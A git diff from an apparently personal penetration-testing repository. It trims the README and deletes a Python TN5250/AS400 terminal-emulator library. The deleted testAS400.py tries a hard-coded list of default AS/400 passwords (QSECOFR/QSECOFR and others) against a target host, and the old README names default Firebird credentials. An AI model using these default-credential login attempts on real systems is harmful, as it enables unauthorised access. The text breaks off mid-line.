diff --git a/README.md b/README.md old mode 100755 new mode 100644 index 811e3f8..cb700cb --- a/README.md +++ b/README.md @@ -1,9 +1,3 @@ -- ip2domains.py -Extracts the common name from the SSL certificate (if its not a wildcard domain). -Performs a reverse lookup on Bing for domains hosted on the IP address - -- firebird/firebird.py -This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey) -If you need an english dictionary wordlist, you can download one from http://www-01.sil.org/linguistics/wordlists/english/wordlist/wordsEn.txt. - +Cheap rip off of https://github.com/milo2012/pentest_scripts +Some stuff has been modified/added/updated for my n33dz. \ No newline at end of file diff --git a/as400/CodePage.py b/as400/CodePage.py deleted file mode 100644 index 6b67cf9..0000000 --- a/as400/CodePage.py +++ /dev/null @@ -1,84 +0,0 @@ -""" -CodePage -Used to convert ascii to ebcdic and ebcdic to ascii -Created by Kenneth J. Pouncey 2002-05-18 -Changed by Nate Custer - 2002-05-22 - Used some different data types to improve performance/memory usage. - Used a dict (hash table) instead of a list for the lookup tables. - The performance of a lookup is faster if you use a dict. Also; used a - tuple instead of a list for the list at the start. Since tuples aren't - mutable the python interpreter uses less memory to store them. -Cleaned up by P. Bielen - 2002-05-23 - Managed a length of 75 characters at one line, to prevend a lot of - editors to do a word-wrap. -""" - -__all__ = ["CodePage"] - -# Tunable parameters -DEBUGLEVEL = 0 - -# Conversion table generated mechanically by Free `recode' 3.5 -# for sequence IBM037..ISO-8859-1 (reversible). */ - -codePage37 = ( 0, 1, 2, 3, 156, 9, 134, 127, 151, 141, 142, 11, \ - 12, 13, 14, 15, 16, 17, 18, 19, 157, 133, 8, 135, \ - 24, 25, 146, 143, 28, 29, 30, 31, 128, 129, 130, 131, \ - 132, 10, 23, 27, 136, 137, 138, 139, 140, 5, 6, \ - 7, 144, 145, 22, 147, 148, 149, 150, 4, 152, 153, 154, \ - 155, 20, 21, 158, 26, 32, 160, 226, 228, 224, 225, 227, \ - 229, 231, 241, 162, 46, 60, 40, 43, 124, 38, 233, 234, \ - 235, 232, 237, 238, 239, 236, 223, 33, 36, 42, 41, \ - 59, 172, 45, 47, 194, 196, 192, 193, 195, 197, 199, 209, \ - 166, 44, 37, 95, 62, 63, 248, 201, 202, 203, 200, \ - 205, 206, 207, 204, 96, 58, 35, 64, 39, 61, 34, \ - 216, 97, 98, 99, 100, 101, 102, 103, 104, 105, 171, \ - 187, 240, 253, 254, 177, 176, 106, 107, 108, 109, 110, \ - 111, 112, 113, 114, 170, 186, 230, 184, 198, 164, 181, \ - 126, 115, 116, 117, 118, 119, 120, 121, 122, 161, 191, \ - 208, 221, 222, 174, 94, 163, 165, 183, 169, 167, 182, 188, \ - 189, 190, 91, 93, 175, 168, 180, 215, 123, 65, 66, \ - 67, 68, 69, 70, 71, 72, 73, 173, 244, 246, 242, 243, \ - 245, 125, 74, 75, 76, 77, 78, 79, 80, 81, 82, 185, \ - 251, 252, 249, 250, 255, 92, 247, 83, 84, 85, 86, 87, \ - 88, 89, 90, 178, 212, 214, 210, 211, 213, 48, 49, 50, \ - 51, 52, 53, 54, 55, 56, 57, 179, 219, 220, 217, 218, \ - 159) - -class CodePage: #CodePage class. - def __init__(self,codePage=None): #Constructor. - if codePage: - self.setCodePage(codePage) - else: - self.setCodePage(37) - - def setCodePage(self,codePage): - self.ascii = {} - self.ebcdic = {} - if codePage == 37: - cp = codePage37 - else: - cp = codePage37 - cpi = 0 - while cpi < 256: - self.ebcdic[cpi] = cp[cpi] - self.ascii[cp[cpi]] = cpi - cpi += 1 - - def getEBCDIC (self,index): - return self.ascii[index] - - def getEBCDICChar (self,index): - return chr(self.ascii[index]) - - def getASCII (self,index): - return self.ebcdic[index] - - def getASCIIChar (self,index): - return chr(self.ebcdic[index]) - - def ebcdic2uni (self,index): - return self.getASCIIChar(index) - - def uni2ebcdic (self,index): - return self.getEBCDICChar(ord(index)) \ No newline at end of file diff --git a/as400/CodePage.pyc b/as400/CodePage.pyc deleted file mode 100644 index 3b3a13d..0000000 Binary files a/as400/CodePage.pyc and /dev/null differ diff --git a/as400/Screen5250.py b/as400/Screen5250.py deleted file mode 100644 index 8a16721..0000000 --- a/as400/Screen5250.py +++ /dev/null @@ -1,276 +0,0 @@ -""" -Screen object -Created by Kenneth J. Pouncey 2002-05-18 -""" -import ScreenFields - -__all__ = ["Screen5250"] - -# Tunable parameters -DEBUGLEVEL = 0 -# Initial Attribute -initAttr = 32 - -class Screen5250: - #Screen5250 interface class. - #def __init__(self, host=None, port=0): - def __init__(self): #Constructor - self._listeners = [] - self.debuglevel = DEBUGLEVEL - # Text Plane of screen - self.textPlane = [] - # Attrubute Plane of screen - self.attrPlane = [] - # number of rows and columns - self.numRows = 24 - self.numCols = 80 - self.screenLength = self.numRows * self.numCols - # current screen position - self.lastPos = 0 - # current screen home position - self.homePos = 0 - # pending insert flag - self.pendingInsert = 0 - # screen virtual terminal - self.vt = None - # set default attribute for screen position row 1 column 1 - self.lastAttr = initAttr - # set up our field format table - self.screenFields = ScreenFields.ScreenFields(self) - loop = 0 - while loop < self.screenLength: - self.textPlane.append(' ') - loop += 1 - loop = 0 - # initialize the attribute plane to default attribute of 0x32 - while loop < self.screenLength: - self.attrPlane.append(self.lastAttr) - loop += 1 - - def set_debuglevel(self, debuglevel): - """Set the debug level. - The higher it is, the more debug output you get (on sys.stdout). - """ - self.debuglevel = debuglevel - - def add_screen_listener( self , func ): - # this is where we give it a "callback" - self._listeners.append( func ) - - def notify_screen_listeners( self, initiator ): - """ this is where we actually call back """ - for f in self._listeners : - f(initiator,1,1,24,80) - - def getRows(self): - return self.numRows - - def getCols(self): - return self.numCols - - def getCurrentRow(self): - return (self.lastPos / self.numCols) + 1; - - def getCurrentCol(self): - return (self.lastPos % self.numCols) + 1; - - def changePos(self,i): - self.lastPos += i; - if self.lastPos < 0: - self.lastPos = self.screenLength + self.lastPos - if self.lastPos > self.screenLength - 1: - self.lastPos = self.lastPos - self.screenLength - - def moveTo(self,row,column): - """ - This routine is based on offset 1,1 not 0,0 it will translate to - offset 0,0 and call the goto_XY(int pos) it is mostly used from - external classes that use the 1,1 offset - """ - self.moveToPos(((row - 1) * self.numCols) + (column-1)) - - def moveToPos(self,pos): - self.lastPos = pos - - def addField(self,attr,fLength,ffw0,ffw1,fcw1,fcw2): - self.lastAttr = attr - self.textPlane[self.lastPos] = 0 - self.attrPlane[self.lastPos] = attr - self.changePos(1) - pos = self.lastPos - sf = self.screenFields.setField(attr,self.getCurrentRow(), \ - self.getCurrentCol(),fLength,ffw0,ffw1,fcw1,fcw2) - #print sf.toString() - # now lets initialize the planes for the field - while fLength > 0: - if self.textPlane[pos] == 0: - self.textPlane[pos] = ' ' - self.attrPlane[pos] = attr - else: - self.attrPlane[pos] = attr - pos +=1 - fLength -=1 - spos = self.lastPos - self.lastPos = pos - self.setAttr(initAttr) - self.lastAttr = attr - self.lastPos = spos - - def setAttr(self,attr): - """ - This routine is used to set attributes in the Attribute Plane - """ - # print chr(char), ' at ' , self.getCurrentRow(), - # ' , ' , self.getCurrentCol() - self.lastAttr = attr - self.attrPlane[self.lastPos] = attr - self.changePos(1) - pos = self.lastPos - while pos < self.screenLength and self.attrPlane[pos] != \ - self.lastAttr: - self.attrPlane[pos] = self.lastAttr - pos += 1 - - def setChar(self,char): - """ - This routine is used to place characters into the Text Plane - """ - if char > 0x0 and char < ' ': - self.textPlane[self.lastPos] = ' ' - self.attrPlane[self.lastPos] = 33 - else: - self.textPlane[self.lastPos] = char - self.changePos(1) - - def clearAll(self): - self.lastPos = 0 - self.lastAttr = 0x32 - self.clearFFT() - self.clearPlanes() - - def clearFFT(self): - self.screenFields.clearFFT() - self.pendingInsert = 0 - self.homePos = -1 - - def clearPlanes(self): - x = 0 - # clear Text Plane - while x < self.screenLength: - self.textPlane[x] = ' ' - x += 1 - x = 0 - # clear Attribute Plane - while x < self.screenLength: - self.attrPlane[x] = self.lastAttr - x += 1 - - def getFields(self): - """ - return an object of Fields contained on the presentation space. - """ - return self.screenFields - - def getPlaneData(self,row,column,endRow,endCol,whichPlane): - loop = 0 - start = ((row - 1) * self.numCols) + (column-1) - end = ((endRow - 1) * self.numCols) + (endCol-1) - length = end - start - if whichPlane == 1: # Text Plane - plane = '' - indices = range(start,start + length) - for idx in indices: - c = self.textPlane[idx] - if c < ' ': - plane += ' ' - else: - plane += c - return plane - elif whichPlane == 2: # Attribute Plane - return self.attrPlane[start:start + length] - - def setVT(self,vt): - """ Set the virtual terminal associated with the screen """ - self.vt = vt - - def sendAidKey(self,aid): - """ Send the aid key to the virtual terminal """ - self.vt.sendAidKey(aid) - - def getPos(self,row,col): - """ Return a position integer from a passed row and column """ - return (row * self.numCols) + col - - def getRow(self,pos): - """ Return row associated to a position """ - row = pos / self.numCols - if row < 0: - row = self.lastPos / self.numCols - if row > (self.screenLength - 1): - row = self.screenLength - 1 - return row; - - def getCol(self,pos): - """ Return col associated to a position """ - col = pos % self.numCols - if col > 0: - return col - else: - return 0 - - def gotoFieldItem(self,item): - """ Move the screen cursor position to the field item """ - sizeFields = self.screenFields.getCount() - if item > sizeFields or item < 0: - return 0 - self.screenFields.setCurrentField(self.screenFields.getItem(item-1)) - while self.screenFields.isCurrentFieldBypassField() and item < sizeFields: - self.screenFields.setCurrentField(self.screenFields.getItem(item)) - item += 1 - return self.gotoField(self.screenFields.getCurrentField()) - - def gotoField(self,f): - if f != None: - self.moveToPos(f.startPos) - return 1 - else: - return 0 - - def setPendingInsert(self, flag, icX, icY): - self.pendingInsert = flag - if self.pendingInsert: - self.homePos = self.getPos(icX,icY) - - def goHome(self): - """ - now we try to move to first input field according to - 14.6 WRITE TO DISPLAY Command - - If the WTD command is valid, after the command is processed, - the cursor moves to one of three locations: - - The location set by an insert cursor order (unless control - character byte 1, bit 1 is equal to B'1'.) - - The start of the first non-bypass input field defined in the - format table - - A default starting address of row 1 column 1. - """ - if self.pendingInsert: - self.moveTo(self.getRow(self.homePos),self.getCol(self.homePos)) - self.isInField() ## we now check if we are in a field - else: - if not self.gotoFieldItem(1): - self.homePos = self.getPos(1,1); - self.moveTo(1,1); - self.isInField(row=0,col=0); ## we now check if we are in a field - else: - self.homePos = self.getPos(self.getCurrentRow(),self.getCurrentCol()) - - def isInField(self,pos=None,row=None,col=None,chgToField=None): - if chgToField == None: - chgToField = 1 - else: - chgToField = 0 - if row != None: - pos = (row * self.numCols) + col - if pos == None: - pos = self.lastPos - return self.screenFields.isInField(pos,chgToField) diff --git a/as400/Screen5250.pyc b/as400/Screen5250.pyc deleted file mode 100644 index f61e22d..0000000 Binary files a/as400/Screen5250.pyc and /dev/null differ diff --git a/as400/ScreenField.py b/as400/ScreenField.py deleted file mode 100644 index a6435b5..0000000 --- a/as400/ScreenField.py +++ /dev/null @@ -1,190 +0,0 @@ -""" -ScreenField object -Created by Kenneth J. Pouncey 2002-05-23 -""" -import Screen5250 - -__all__ = ["SessionField"] - -# Tunable parameters -DEBUGLEVEL = 0 - -class ScreenField: - """Session Field interface class. """ - def __init__(self,screen): - """Constructor. """ - self.debuglevel = DEBUGLEVEL - self.screen = screen - - def set_debuglevel(self, debuglevel): - """Set the debug level. - The higher it is, the more debug output you get (on sys.stdout). - """ - self.debuglevel = debuglevel - - def setField(self,attr,row,col,len,ffw1,ffw2,fcw1,fcw2): - """ Set the field attributes """ - self.length = len - self.startPos = (row * self.screen.getCols()) + col - self.endPos = self.startPos + len -1 - self.cursorProg = 0 - self.fieldId = 0 - self.attr = attr - self.setFFWs(ffw1,ffw2) - self.setFCWs(fcw1,fcw2) - self.next = None - self.prev = None - return self - - def getAttr(self): - return self.attr - - def getHighlightedAttr(self): - return self.fcw2 | 0x20 - - def getLength(self): - return self.length - - def setFFWs(self,ffw1,ffw2): - self.ffw1 = ffw1; - self.ffw2 = ffw2; - self.mdt = (ffw1 & 0x8 ) == 0x8; - return self.mdt; - - def setFCWs(self,fcw1,fcw2): - self.fcw1 = fcw1; - self.fcw2 = fcw2; - if (fcw1 == 0x88): - self.cursorProg = fcw2; - - def getFFW1(self): - return self.ffw1 - - def getFFW1(self): - return self.ffw2 - - def getFCW1(self): - return self.ffc1 - - def getFCW1(self): - return self.ffc2 - - def getFieldLength(self): - return self.length - - def getFieldId(self): - return self.fieldId - - def setFieldId(self,fi): - self.fieldId = fi - - def getCursorProgression(self): - return self.cursorProg - - def getCursorRow(self): - return cursorPos / self.screen.getCols(); - - def getCursorCol(self): - return cursorPos % self.screen.getCols(); - - def changePos(self,i): - self.cursorPos += i - - def getText(self): - start = self.startPos - text = [] - while start <= self.endPos: - text.append(self.screen.textPlane[start]) - start += 1 - return text - - def setString(self,text): - start = self.startPos - for x in text: - self.screen.textPlane[start] = x - start += 1 - self.mdt = 1 - self.screen.notify_screen_listeners(0) - - def setFieldChar(self,c): - x = self.length - self.cursorPos = self.startPos - while x > 0: - self.screen.textPlane[cursorPos] = c - self.changePos(1) - x -= 1 - - def resetMDT(self): - self.mdt = 0 - - def setMDT(self): - self.mdt = 1 - - def isBypassField(self): - return (self.ffw1 & 0x20) == 0x20 - - def getAdjustment(self): - return (self.ffw2 & 0x7) - - def isFER(self): - return (self.ffw2 & 0x40) == 0x40 - - def isMandatoryEnter(self): - return (self.ffw2 & 0x8) == 0x8 - - def isToUpper(self): - return (self.ffw2 & 0x20) == 0x20 - - def getFieldShift(self): - """ - return bits 5 - 7 of FFW1 which holds the shift adjustment - of the field - """ - return (self.ffw1 & 0x7) - - def isHighlightedEntry(self): - return (self.fcw1 == 0x89) - - def isAutoEnter(self): - return (self.ffw2 & 0x80) == 0x80 - - def isSignedNumeric(self): - return (self.getFieldShift() == 7) - - def getKeyPosRC(self,row1,col1): - x = ((row1 * self.screen.getCols()) + col1); - y = x - self.startPos; - self.cursorPos = x; - return y; - - def getKeyPos(self, pos): - y = self.pos - self.startPos - self.cursorPos = pos - return y - - def getCurrentPos(self): - return self.cursorPos - - def withinField(self,pos): - if (pos >= self.startPos) and (pos <= self.endPos): - return 1 - return 0 - - def startPos(self): - return self.startPos - - def startRow(self): - return self.startPos / self.screen.getCols() - - def startCol(self): - return self.startPos % self.screen.getCols() - - def endPos(self): - return self.endPos - - def toString(self): - return 'startRow =', self.startRow(), 'startCol =',self.startCol(), \ - 'length =',self.length,'ffw1 = ',self.ffw1,'ffw2 = ',self.ffw1, \ - 'is bypass field',self.isBypassField(),'isAutoEnter', \ - self.isAutoEnter(),'is Mandatory Enter',self.isMandatoryEnter(), \ - 'modified',self.mdt \ No newline at end of file diff --git a/as400/ScreenField.pyc b/as400/ScreenField.pyc deleted file mode 100644 index 12ecb0f..0000000 Binary files a/as400/ScreenField.pyc and /dev/null differ diff --git a/as400/ScreenFields.py b/as400/ScreenFields.py deleted file mode 100644 index 9d915ea..0000000 --- a/as400/ScreenFields.py +++ /dev/null @@ -1,158 +0,0 @@ -""" -ScreenFields object -Created by Kenneth J. Pouncey 2002-05-23 -""" -import Screen5250 -import ScreenField - -__all__ = ["SessionFields"] - -# Tunable parameters -DEBUGLEVEL = 0 -CMD_READ_INPUT_FIELDS = 0x42 ## 66 -CMD_READ_MDT_FIELDS = 0x52 ## 82 -CMD_READ_MDT_IMMEDIATE_ALT = 0x83 ## 131 - -class ScreenFields: - """SessionFields interface class.""" - def __init__(self,screen): - """Constructor.""" - self.debuglevel = DEBUGLEVEL - self.screen = screen - self.clearFFT() - - def set_debuglevel(self, debuglevel): - """Set the debug level. - The higher it is, the more debug output you get (on sys.stdout). - """ - self.debuglevel = debuglevel - - def clearFFT(self): - """ - clear field format table - """ - self.screenFields = [] - self.currentField = None - self.sizeFields = 0 - self.nextField = 0 - self.fieldIds = 0 - self.cpfExists = 0; # clear the cursor progression fields flag - masterMDT = 0; - - def existsAtPos(self,pos): - """ - does a field exist at the position passed in - """ - for x in self.fields: - sf = self.fields[x] - if pos == sf.startPos(): - self.currentField = sf - return 1 - return 0 - - def isMasterMDT(self): - """ Is the master modified data tag set """ - return self.masterMDT - - def setCurrentField(self,field): - """ Set the current field to the field passed in """ - self.currentField = field - - def isCurrentFieldBypassField(self): - """ - Return whether or not the current field is a bypass field or not - """ - self.currentField.isBypassField() - - def isCurrentField(self): - """ Do we have a current field set """ - return self.currentField == None - - def getCurrentField(self): - """ - return the current field position within the field plane - """ - return self.currentField - - def setField(self,attr,row,col,len,ffw1,ffw2,fcw1,fcw2): - """ - Set a field in the current session screen - """ - self.screenFields.append(ScreenField.ScreenField(self.screen)) - sf = self.screenFields[self.nextField] - sf.setField(attr,row-1,col-1,len,ffw1,ffw2,fcw1,fcw2) - self.nextField += 1 - self.sizeFields += 1 - if not sf.isBypassField(): - self.fieldIds += 1 - sf.setFieldId(self.fieldIds) - if fcw1 == 0x88: - self.cpfExists = 1 - if self.currentField != None: - self.currentField.next = sf - sf.prev = self.currentField - self.currentField = sf - masterMDT = self.currentField.mdt - return self.currentField - - def readFormatTable(self,boasp,readType,codePage): - """ - Read the current screen fields and format them so that they can - be sent to the Host - """ - isSigned = 0 - sb = None - if self.isMasterMDT: - for sf in self.screenFields: - if sf.mdt or (readType == CMD_READ_INPUT_FIELDS): - sb = sf.getText() - if readType == CMD_READ_MDT_FIELDS or \ - readType == CMD_READ_MDT_IMMEDIATE_ALT: - len2 = len(sb) - 1 - while len2 >= 0 and sb[len2] < ' ': - sb = sb[:-1] - len2 -= 1 - if sf.isSignedNumeric() and len(sb) > 0 and sb[-1] == '-': - isSigned = 1 - len3 = len(sb) - if len3 > 0 or (readType == CMD_READ_MDT_FIELDS or \ - readType == CMD_READ_MDT_IMMEDIATE_ALT): - if len3 > 0 or (readType == CMD_READ_MDT_FIELDS or \ - readType == CMD_READ_MDT_IMMEDIATE_ALT): - boasp.append(17) - boasp.append(sf.startRow() + 1) - boasp.append(sf.startCol() + 1) - k = 0 - while k < len3: - if sb[k] < ' ': - boasp.append(codePage.uni2ebcdic(' ')) - else: - if isSigned and k == len3 -1: - boasp.append(0xd0 | (0x0f & c)) - else: - boasp.append(ord(codePage.uni2ebcdic(sb[k]))) - k +=1 - - def __getitem__(self,i): - if i < self.sizeFields: - return self.screenFields[i] - else: - raise IndexError - - def getItem(self,i): - if i < self.sizeFields: - return self.screenFields[i] - else: - raise IndexError - - def getCount(self): - """ Return the number of fields in the current field plane """ - return self.sizeFields - - def isInField(self, pos, chgToField): - for sf in self.screenFields: - if sf.withinField(pos): - if chgToField: - self.currentField = sf - return 1 - return 0 \ No newline at end of file diff --git a/as400/ScreenFields.pyc b/as400/ScreenFields.pyc deleted file mode 100644 index c67db13..0000000 Binary files a/as400/ScreenFields.pyc and /dev/null differ diff --git a/as400/Session.py b/as400/Session.py deleted file mode 100644 index 9f756f0..0000000 --- a/as400/Session.py +++ /dev/null @@ -1,60 +0,0 @@ -""" -Session object -Created by Kenneth J. Pouncey 2002-05-19 -""" -from vt5250 import vt5250 -from Screen5250 import Screen5250 - -__all__ = ["Session"] - -# Tunable parameters -DEBUGLEVEL = 0 -# Telnet Port -TELNET_PORT = 993 - -class Session: - """Session interface class.""" - def __init__(self,host=None,port=0): - """Constructor.""" - self.debuglevel = DEBUGLEVEL - self.vt = vt5250() - self.vt.set_debuglevel(self.debuglevel) - self.screen = Screen5250() - self.screen.set_debuglevel(self.debuglevel) - self.vt.setScreen(self.screen) - self.screen.setVT(self.vt) - if host: - self.host = host - else: - self.host = 'localhost' - if port: - self.setPort(port) - else: - self.port = TELNET_PORT - - def set_debuglevel(self, debuglevel): - """ - Set the debug level. - The higher it is, the more debug output you get (on sys.stdout). - """ - self.debuglevel = debuglevel - self.vt.set_debuglevel(self.debuglevel) - self.screen.set_debuglevel(self.debuglevel) - - def connect(self): - self.vt.open(self.host,self.port) - - def disconnect(self): - self.vt.close() - - def setHost(self,host): - self.host = host - - def setPort(self,port): - try: - self.port = int(port) - except ValueError: - self.port = TELNET_PORT - - def getScreen(self): - return self.screen diff --git a/as400/Session.pyc b/as400/Session.pyc deleted file mode 100644 index 9017914..0000000 Binary files a/as400/Session.pyc and /dev/null differ diff --git a/as400/SessionManager.py b/as400/SessionManager.py deleted file mode 100644 index bce86a1..0000000 --- a/as400/SessionManager.py +++ /dev/null @@ -1,44 +0,0 @@ -""" -SessionManager and Sessions objects -Created by Nathanael Custer 2002-07-01 -""" -from Sessions import Sessions - -__all__ = ["SessionManager"] - -# Tunable parameters -DEBUGLEVEL = 0 -# Telnet Port TELNET_PORT = 23 - -class SessionManager: - def __init__(self): - self.MasterSessionList = Sessions() - - def getSessions(self): - return self.MasterSessionList - - def openSession(self, name=''): - self.MasterSessionList._addSession(name) - return self.MasterSessionList.item(name) - - def closeSession(self, name=''): - session = self.MasterSessionList.item(name) - self.MasterSessionList._delSession(name) - - def refresh(self): - return self.MasterSessionList - -if __name__ == '__main__': - test = SessionManager() - print "Generating 10 test sessions." - for x in range(10): - test.openSession('test' + str(x)) - print "Here is the list of the sessions:" - a = test.getSessions() - print a.list - print "Now removing the sessions one at a time" - for x in range(10): - test.closeSession('test' + str(x)) - a = test.refresh() - print "One less" - print a.list diff --git a/as400/Sessions.py b/as400/Sessions.py deleted file mode 100644 index da63d87..0000000 --- a/as400/Sessions.py +++ /dev/null @@ -1,38 +0,0 @@ -""" -SessionManager and Sessions objects -Created by Nathanael Custer 2002-07-01 -""" -from Session import Session - -__all__ = ["Sessions"] - -# Tunable parameters -DEBUGLEVEL = 0 -# Telnet Port -TELNET_PORT = 23 - -class Sessions: - def __init__(self): - self.list = [] - - def _addSession(self, name=''): - session = [name, Session()] - self.list.append(session) - - def _delSession(self, name=''): - for x in self.list: - if name == x[0]: - self.list.remove(x) - #else: - #raise error here - - def item(self, name=''): - for x in self.list: - if name == x[0]: - return x[1] - - def item_index(self, index=0): - return self.list[index][1] - - def _list(self): - return self.list \ No newline at end of file diff --git a/as400/frmConnect.py b/as400/frmConnect.py deleted file mode 100644 index 75ed028..0000000 --- a/as400/frmConnect.py +++ /dev/null @@ -1,56 +0,0 @@ -#Boa:Frame:wxFrame1 - -from wxPython.wx import * -from wxPython.grid import * - -def create(parent): - return wxFrame1(parent) - -[wxID_WXFRAME1, wxID_WXFRAME1BUTTON1, wxID_WXFRAME1BUTTON2, - wxID_WXFRAME1BUTTON3, wxID_WXFRAME1BUTTON4, wxID_WXFRAME1BUTTON5, - wxID_WXFRAME1BUTTON6, wxID_WXFRAME1GRID1, -] = map(lambda _init_ctrls: wxNewId(), range(8)) - -class wxFrame1(wxFrame): - def _init_utils(self): - # generated method, don't edit - pass - - def _init_ctrls(self, prnt): - # generated method, don't edit - wxFrame.__init__(self, id=wxID_WXFRAME1, name='', parent=prnt, - pos=wxPoint(350, 272), size=wxSize(370, 310), - style=wxDEFAULT_FRAME_STYLE, title='TN5250PY - Verbindingen') - self._init_utils() - self.SetClientSize(wxSize(362, 276)) - - self.grid1 = wxGrid(id=wxID_WXFRAME1GRID1, name='grid1', parent=self, - pos=wxPoint(0, 0), size=wxSize(370, 200), style=0) - self.grid1.SetDefaultRowSize(15) - - self.button1 = wxButton(id=wxID_WXFRAME1BUTTON1, label='Toevoegen', - name='button1', parent=self, pos=wxPoint(25, 210), size=wxSize(90, - 23), style=0) - - self.button2 = wxButton(id=wxID_WXFRAME1BUTTON2, label='Verwijderen', - name='button2', parent=self, pos=wxPoint(140, 210), - size=wxSize(90, 23), style=0) - - self.button3 = wxButton(id=wxID_WXFRAME1BUTTON3, label='Eigenschappen', - name='button3', parent=self, pos=wxPoint(255, 210), - size=wxSize(90, 23), style=0) - - self.button4 = wxButton(id=wxID_WXFRAME1BUTTON4, label='Verbinden', - name='button4', parent=self, pos=wxPoint(25, 245), size=wxSize(90, - 23), style=0) - - self.button5 = wxButton(id=wxID_WXFRAME1BUTTON5, label='Opslaan', - name='button5', parent=self, pos=wxPoint(140, 245), - size=wxSize(90, 23), style=0) - - self.button6 = wxButton(id=wxID_WXFRAME1BUTTON6, label='Annuleren', - name='button6', parent=self, pos=wxPoint(255, 245), - size=wxSize(90, 23), style=0) - - def __init__(self, parent): - self._init_ctrls(parent) diff --git a/as400/frmConnect.pyc b/as400/frmConnect.pyc deleted file mode 100644 index 79a3ced..0000000 Binary files a/as400/frmConnect.pyc and /dev/null differ diff --git a/as400/testAS400.py b/as400/testAS400.py deleted file mode 100644 index a447c4c..0000000 --- a/as400/testAS400.py +++ /dev/null @@ -1,107 +0,0 @@ -import argparse -import time -import sys -import Session -import Screen5250 -import ScreenFields -import CodePage -from sys import argv -__all__ = ["testsession"] -myScreen = None -foundText = "" -class testsession: - def __init__(self): - self.first = 1 - self.USERID = None - self.PASSWORD = None - def outputScreen(self,initiator,startRow,startColumn,endRow,endColumn): - """ - Callable method to get screen updates - """ - #print 'ScreenUpdated - initiated from ',initiator, \ - # ' Starting from -> ',startRow,endRow,' to -> ',endRow,endColumn - if initiator == 0: ## 0 is from client and 1 is from host - return - # Note we only print the first 12 rows here - indices = range(1,24) - #for idx in indices: - #print myScreen.getPlaneData(idx,1,idx,80,1) - #print self.screen.getPlaneData(idx,1,80,2) - fields = myScreen.getFields() - if self.USERID == None or self.PASSWORD == None: - self.USERID = raw_input("What's your username ? > ") - self.PASSWORD = raw_input("What's your password ? > ") - if self.first == 1: - field = fields.getItem(0) - field.setString(self.USERID) - field = fields.getItem(1) - field.setString(self.PASSWORD) - #for field in fields: - # print field.toString() - # #print field.getText() - - #print fields.readFormatTable(0x42,CodePage.CodePage()) - #print myScreen.getFields().readFormatTable(0x52,CodePage.CodePage()) - # Note we only print the first 12 rows here - indices = range(1,25) - global foundText - for idx in indices: - output = myScreen.getPlaneData(idx,1,idx,80,1) - if "does not exist" in output: - foundText=output - if "cannot sign on" in output: - foundText=output - if "No password associated" in output: - foundText=output - #if len(foundText.strip())>0: - # print foundText - #else: - # print "It might be possible to login with ("+self.USERID+"|"+self.PASSWORD+")" - #print myScreen.getPlaneData(idx,1,idx,80,1) - - #print 'number of fields',myScreen.getFields().getCount() - if self.first < 7: - myScreen.sendAidKey(0xF1) - self.first += 1 -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('-i',dest='hostIP',action='store',help='[IP of AS/400 host]') - parser.add_argument('-p',dest='portNo',action='store',help='[Port of AS/400 host]') - options = parser.parse_args() - - if len(sys.argv)==1: - parser.print_help() - sys.exit() - else: - if options.hostIP and options.portNo: - userList=[] - userList.append(('QSECOFR','QSECOFR')) - userList.append(('QPGWR','QPGWR')) - userList.append(('QUSER','QUSER')) - userList.append(('QSYSOFR','QSYSOFR')) - userList.append(('QSRVBAS','QSRVBAS')) - userList.append(('QSRV','QSRV')) - userList.append(('QDFTOWN','QDFTOWN')) - - host = options.hostIP - - for user in userList: - ts = testsession() - ts.USERID = user[0] - ts.PASSWORD = user[1] - print "\n[*] Testing ("+user[0]+"|"+user[1]+")" - session = Session.Session(host) - session.setPort = options.portNo - session.set_debuglevel(0) - myScreen = session.getScreen() - session.getScreen().add_screen_listener(ts.outputScreen) - session.connect() - time.sleep(2) - if len(foundText.strip())>0: - print foundText - else: - print "It might be possible to login with ("+user[0]+"|"+user[1]+")" - - session.disconnect() - sys.exit() - diff --git a/as400/tn5250.old.py b/as400/tn5250.old.py deleted file mode 100644 index 45f7bad..0000000 --- a/as400/tn5250.old.py +++ /dev/null @@ -1,162 +0,0 @@ -#!/usr/local/bin/python -######################################################################### -# Tk8.0 style main window menus # -######################################################################### - -from Tkinter import * # get widget classes -from tkMessageBox import * # get standard dialogs -from tkSimpleDialog import askstring -import Session -import Screen5250 -import ScreenFields -from SessionManager import SessionManager -#import Sessions -import CodePage -from sys import argv - -__all__ = ["testsession"] - -class StartFrame(Frame): # an extended frame - def __init__(self, parent=None): # attach to top-level? - self.first = 1 - self.USERID = None - self.PASSWORD = None - self.myScreen = None - - Frame.__init__(self, parent) # do superclass init - self.canvas = Canvas(parent,width=600,height=500, bg='black') - self.manager = SessionManager() - self.pack() - - self.createWidgets() # attach frames/widgets - self.master.title("TN5250 for Python - Testing") - self.master.iconname("TN5250") # label when iconified - self.strprg() - - def outputScreen(self, initiator, startRow, startColumn, endRow, endColumn): - """ - Callable method to get screen updates - """ - print 'ScreenUpdated - initiated from ', initiator, \ - ' Starting from -> ',startRow,endRow,' to -> ', \ - endRow,endColumn - - if initiator == 0: ## 0 is from client and 1 is from host - return - - # Note we only print the first 12 rows here - indices = range(1,24) - - # for idx in indices: - # print self.myScreen.getPlaneData(idx,1,idx,80,1) - # print self.screen.getPlaneData(idx,1,80,2) - - fields = self.myScreen.getFields() - - if self.USERID == None or self.PASSWORD == None: - self.USERID = raw_input("What's your username ? > ") - self.PASSWORD = raw_input("What's your password ? > ") - - if self.first == 1: - field = fields.getItem(0) - field.setString(self.USERID) - field = fields.getItem(1) - field.setString(self.PASSWORD) - - for field in fields: - #print field.toString() - print field.getText() - - #print fields.readFormatTable(0x42,CodePage.CodePage()) - #print myScreen.getFields().readFormatTable(0x52,CodePage.CodePage()) - # Note we only print the first 12 rows here - indices = range(1,25) - row = 0 - - for idx in indices: - text = self.myScreen.getPlaneData(idx,1,idx,80,1) - row += 15 - col = 0 - indx = range(0,79) - for x in indx: - col += 10 - self.canvas.create_text(col,row,text=text[x], anchor=E, fill='green') - - print 'number of fields',self.myScreen.getFields().getCount() - """ - Patrick here I just keep pressing enter so that the screens - keep coming up to see the messages. Actually 6 times. - the first is to send username and password. Then 2 more times - to get passed messages and stuff. Then 2 more times to - get messages at the bottom of the screen to make sure all is - coming up. Change this number if you want less for now. - """ - - if self.first < 7: - self.myScreen.sendAidKey(0xF1) - self.first += 1 - - def strprg(self): - if len(argv) >= 2: host = argv[1] - else: - host = askstring('Hostname', "Name of the Host ?") - - #ts = testsession() - - if len(argv) > 3: - self.USERID = argv[2] - self.PASSWORD = 